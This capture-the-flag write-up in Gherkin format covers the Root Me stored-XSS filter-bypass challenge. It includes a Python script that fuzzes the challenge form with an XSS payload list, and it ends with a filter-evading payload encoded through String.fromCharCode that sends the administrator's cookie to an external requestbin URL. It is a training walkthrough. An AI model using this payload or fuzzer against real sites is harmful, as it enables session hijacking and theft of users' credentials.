# Version 2.0
## language: en

Feature: XSS - Stored - filter bypass - Root Me

  Site:
    https://www.root-me.org
  Category:
    web - client
  User:
    anders2d
  Goal:
    Get the flag.

  Background:
  Hacker's software:
    | <Software name> |  <Version>  |
    | Ubuntu          |    20.04.1  |
    | Firefox         |    43.0     |
    | Python          |    3.8.5    |
    | VS Code         |    1.50     |
    | Burp suite      |    2020.9.2 |

  Machine information:
    Given The challenge URL
    """
    https://www.root-me.org/en/Challenges/Web-Client/
    XSS-Stored-filter-bypass
    """
    And The challenge statement
    """
    Steal the administrator’s session cookie.
    """
  Scenario: Fail: common XSS
    Given I started the challenge
    And I was using common XSS statements with burp
    Then denied messages appeared [evidence](image1.png)

  Scenario: Fail: using OWASP evasion cheat sheet
    Given evasion cheat sheet
    When I intrude all cheat sheet
    And I check the web
    Then I notice that no anyone cheat works

  Scenario: Fail: taking it slow
    Given an input that allows HTML characters
    When I put keywords
    And I sent it and let web to render
    Then I notice that exists some forbidden words
    """
    - alert
    - document.write
    - eval
    - number sign
    - quotation marks
    - equal sign
    """

  Scenario: Success: cheat sheet avoiding some words
    Given forbidden words
    Then I searched a big cheat sheet on internet
    And I found a 6586-lines cheat sheet
    """
    github.com/payloadbox/xss-payload-list/blob/master/
    Intruder/xss-payload-list.txt
    """
    Then I replace forbidden words with good words
    And I run the following script using the cheat sheet
    """
    import requests
    import time
    import os

    from threading import Thread

    burp0_url = "http://challenge01.root-me.org:80/web-client/ch21/index.php"
    burp0_cookies = {"PHPSESSID": "My pgpsessid"}
    burp0_headers = {"User-Agent": "My user agent",
                    "Accept": "text/html,application/xhtml+xml
    ,application/xml;q=0.9,image/webp,*/*;q=0.8",
                    "Accept-Language": "en-US,en;q=0.5",
                    "Accept-Encoding": "gzip, deflate",
                    "Content-Type": "application/x-www-form-urlencoded",
                    "Origin": "http://challenge01.root-me.org",
                    "Connection": "close", "Referer": "http://challenge01.
    root-me.org/web-client/ch21/index.php",
                    "Upgrade-Insecure-Requests": "1"}


    def send_req(arg):
        burp0_data = f"title=asdf&message={arg}"
        burp0_data = burp0_data.encode(encoding='utf-8')
        req = requests.post(burp0_url, headers=burp0_headers,
                            cookies=burp0_cookies, data=burp0_data)
        if (len(req.text) > 300):
            print(arg)
            with open("filter3.txt", "a") as myfile:
                myfile.write(arg)


    for i in open("test1.txt"):
        t = Thread(target=send_req, args=(i, ))
        t.start()
        time.sleep(0.02)
    """
    Then I collect several good payloads
    And I found a good payload that could work
    """
    <keygen autofocus onfocus=anygoodfunction />
    """
    Then I tried to send this cheat with a requestbin link:
    """
    <keygen autofocus onfocus=a=document;a.write('
       <img
       src='https://MY_REQUESTBIN.m.pipedream.net?test=1
       />
    ')/>
    """
    And I notice that send string is forbidden
    Then I convert inject html to char code
    """
    60,105,109,103,32,115,114,99,61,39,104,116,
    116,112,115,58,47,47,98,99,53,57,98,97,56,
    49,98,48,52,100,49,97,57,97,57,100,53,101,
    99,51,49,49,98,49,56,56,97,49,55,55,46,109,
    46,112,105,112,101,100,114,101,97,109,46,110,
    101,116,63,116,101,115,116,61
    """
    And finally paload worked
    Then I concat cookie to payload
    """
    title=asdf&message=<keygen autofocus onfocus=a=document;a.write(
    String.fromCharCode(60,105,109,103,32,115,114,99,61,39,
    104,116,116,112,115,58,47,47,98,99,53,57,98,97,56,49,98,
    48,52,100,49,97,57,97,57,100,53,101,99,51,49,49,98,49,56,
    56,97,49,55,55,46,109,46,112,105,112,101,100,114,101,97,
    109,46,110,101,116,63,116,101,115,116,61).concat(a.cookie)
    .concat(String.fromCharCode(39,47,62))) />
     )/>
    """
    Then it worked fine [evidence](image2.png)
    Then I finally got admin cookie and passed the challenge
